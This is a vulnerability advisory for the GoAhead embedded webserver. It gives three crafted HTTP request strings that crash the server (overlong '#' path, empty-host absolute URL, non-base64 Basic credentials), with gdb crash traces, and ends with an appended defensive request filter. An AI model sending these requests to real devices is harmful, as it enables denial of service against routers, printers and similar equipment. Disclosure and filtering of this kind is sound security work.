# Title: Embedthis GoAhead Webserver multiple DoS vulnerabilities.
# Author: 0in (Maksymilian Motyl)
# Date: 18.02.2014
# Version: 3.1.3-0
# Software Link: http://embedthis.com/products/goahead/
# Download: https://github.com/embedthis/goahead
# Tested on: Linux x32
# Description:
# "GoAhead is embedded in hundreds of millions of devices and applications like: printers, routers, switches, IP phones, mobile applications, data acquisition,
# military applications and WIFI gateways."
# .... Ok.
# But I cannot confirm any vulnerability in products listed at http://embedthis.com/products/goahead/users.html

-----------------------------------------------
1st vulnerability
***************************************
#!/usr/bin/python
# Request with a 1024-byte run of '#' inside the query part of a CGI path
packet="GET /cgi-bin/test/a/c/?"+"#"*1024+".cgi/c.txt HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"User-Agent: BillyExploiter\r\n"\
"Accept: text/html\r\n"\
"Accept-Language: pl\r\n"\
"Accept-Encoding: gzip, deflate\r\n"\
"Connection: keep-alive"
***************************************
Program received signal SIGABRT, Aborted.
0xb7772424 in __kernel_vsyscall ()
(gdb) bt
#0  0xb7772424 in __kernel_vsyscall ()
#1  0xb757d941 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#2  0xb7580d72 in *__GI_abort () at abort.c:92
#3  0xb75b9e15 in __libc_message (do_abort=2, fmt=0xb7691e70 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:189
#4  0xb75c3f01 in malloc_printerr (action=<optimized out>, str=0x6 <Address 0x6 out of bounds>, ptr=0xb7765dad) at malloc.c:6283
#5  0xb75c517e in munmap_chunk (p=<optimized out>) at malloc.c:3540
#6  0xb7752d74 in termWebs (wp=wp@entry=0x8573240, reuse=reuse@entry=1) at src/http.c:457
#7  0xb775309c in reuseConn (wp=0x8573240) at src/http.c:520
#8  complete (wp=wp@entry=0x8573240, reuse=reuse@entry=1) at src/http.c:575
#9  0xb7754571 in websPump (wp=wp@entry=0x8573240) at src/http.c:837
#10 0xb7755606 in readEvent (wp=0x8573240) at src/http.c:797
#11 socketEvent (wptr=0x8573240, mask=2, sid=<optimized out>) at src/http.c:735

*** glibc detected *** goahead: munmap_chunk(): invalid pointer: 0xb7765dad ***

(gdb) x/xw 0xb7765dad
0xb7765dad:     0x74746800      # "tth"

-----------------------------------------------
2nd vulnerability
***************************************
#!/usr/bin/python
# Absolute-form request target with no host after the scheme
packet="GET http:// HTTP/1.1\r\n"
# Same crash happens when:
packet="GET http://dupa: HTTP/1.1\r\n"
***************************************
Program received signal SIGSEGV, Segmentation fault.
websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1) at src/http.c:2225
warning: Source file is more recent than executable.
2225        *op = *ip;
(gdb) bt
#0  websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1) at src/http.c:2225
#1  0xb774248f in websUrlParse (url=0x83bf140 "http", url@entry=0x83cd58c "http://", pbuf=pbuf@entry=0xbfe6ce14, pprotocol=pprotocol@entry=0x0, phost=phost@entry=0xbfe6ce00, pport=pport@entry=0xbfe6ce0c, ppath=ppath@entry=0xbfe6ce08, pext=pext@entry=0xbfe6ce10, preference=preference@entry=0x0, pquery=pquery@entry=0xbfe6ce04) at src/http.c:3122
#2  0xb7745079 in parseFirstLine (wp=0x83bf240) at src/http.c:949
#3  parseIncoming (wp=0x83bf240) at src/http.c:870
(gdb) disas $eip
   0xb773fb28 <+72>:    cmp    $0x25,%dl
   0xb773fb2b <+75>:    je     0xb773fb70 <websDecodeUrl+144>
=> 0xb773fb2d <+77>:    mov    %dl,(%esi)
(gdb) info reg
eax            0x1              1
ecx            0x13             19
edx            0x2f             47
ebx            0xb775e91c       -1217009380
esp            0xbfe6cd20       0xbfe6cd20
ebp            0xb7756254       0xb7756254
esi            0xb7756253       -1217043885
edi            0xb7756253       -1217043885
eip            0xb773fb2d       0xb773fb2d <websDecodeUrl+77>
(gdb) x/xw 0xb7756253
0xb7756253:     0x7473002f

-----------------------------------------------
3rd vulnerability
***************************************
#!/usr/bin/python
# Basic authentication header whose credential value is not valid base64
packet="GET http://127.0.0.1/auth/basic/ HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"Accept: text/html\r\n"\
"Accept-Language: pl\r\n"\
"Accept-Encoding: gzip, deflate\r\n"\
"Connection: keep-alive\r\n"\
"Authorization: Basic #\r\n"
***************************************
(gdb) bt
#0  strchr () at ../sysdeps/i386/strchr.S:127
#1  0xb770652a in parseBasicDetails (wp=0x8055240) at src/auth.c:717
#2  0xb7706c31 in websAuthenticate (wp=wp@entry=0x8055240) at src/auth.c:110
#3  0xb7717532 in websRouteRequest (wp=wp@entry=0x8055240) at src/route.c:85
(gdb) disas $eip
   0xb758799a <+90>:    lea    0x0(%esi),%esi
   0xb75879a0 <+96>:    add    $0x10,%eax
=> 0xb75879a3 <+99>:    mov    (%eax),%ecx
(gdb) info reg
eax            0x0              0
ecx            0x3a3a           14906
edx            0x3a3a3a3a       976894522
ebx            0xb772a91c       -1217222372
esp            0xbfc71428       0xbfc71428
ebp            0x8055240        0x8055240
esi            0x8055240        134566464
edi            0x0              0
eip            0xb75879a3       0xb75879a3 <strchr+99>
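As an added defensive example that is not part of the original advisory, the following request pre-filter rejects the three malformed request shapes reported above (oversized or fragment-bearing request-target, absolute-form target with an empty host or port, and a Basic credential that is not base64 or lacks the user:password separator) before they reach an embedded HTTP parser such as the one in a front-end proxy would protect. The sample requests are constructed from the advisory's PoC strings; `check_request` and its thresholds are assumptions of this example, and it generalizes to any absolute-form target and any Basic header rather than only the three PoC values.

```python
import base64

# Constructed sample requests: the three malformed shapes this advisory reports
# against GoAhead 3.1.3 (built from its PoC strings) plus one well-formed control.
SAMPLES = {
    "long_fragment": ("GET /cgi-bin/test/a/c/?" + "#" * 1024 + ".cgi/c.txt HTTP/1.1\r\n"
                      "Host: 127.0.0.1\r\n\r\n"),
    "empty_host": "GET http:// HTTP/1.1\r\n\r\n",
    "empty_port": "GET http://dupa: HTTP/1.1\r\n\r\n",
    "bad_basic": ("GET http://127.0.0.1/auth/basic/ HTTP/1.1\r\nHost: 127.0.0.1\r\n"
                  "Authorization: Basic #\r\n\r\n"),
    # "dXNlcjpwYXNz" is base64 for "user:pass"
    "benign": "GET /index.html HTTP/1.1\r\nHost: 127.0.0.1\r\nAuthorization: Basic dXNlcjpwYXNz\r\n\r\n",
}

def check_request(raw, max_target=512):
    """Return the reasons a raw HTTP/1.x request head should be rejected before
    it reaches a fragile embedded parser; an empty list means nothing suspicious."""
    reasons = []
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return ["malformed request line"]
    target = parts[1]
    if len(target) > max_target:
        reasons.append("request-target longer than %d bytes" % max_target)
    if "#" in target:
        # a conforming client never sends the fragment part on the wire
        reasons.append("fragment character in request-target")
    if "://" in target:
        # absolute-form target: the authority needs a host and, if given, a numeric port
        authority = target.split("://", 1)[1].split("/", 1)[0]
        host, _, port = authority.partition(":")
        if not host:
            reasons.append("absolute-form target with empty host")
        if authority.endswith(":") or (port and not port.isdigit()):
            reasons.append("absolute-form target with empty or non-numeric port")
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() != "authorization":
            continue
        scheme, _, cred = value.strip().partition(" ")
        if scheme.lower() != "basic":
            continue
        try:
            decoded = base64.b64decode(cred, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            reasons.append("Basic credentials are not valid base64")
            continue
        if b":" not in decoded:
            reasons.append("Basic credentials lack the user:password separator")
    return reasons
```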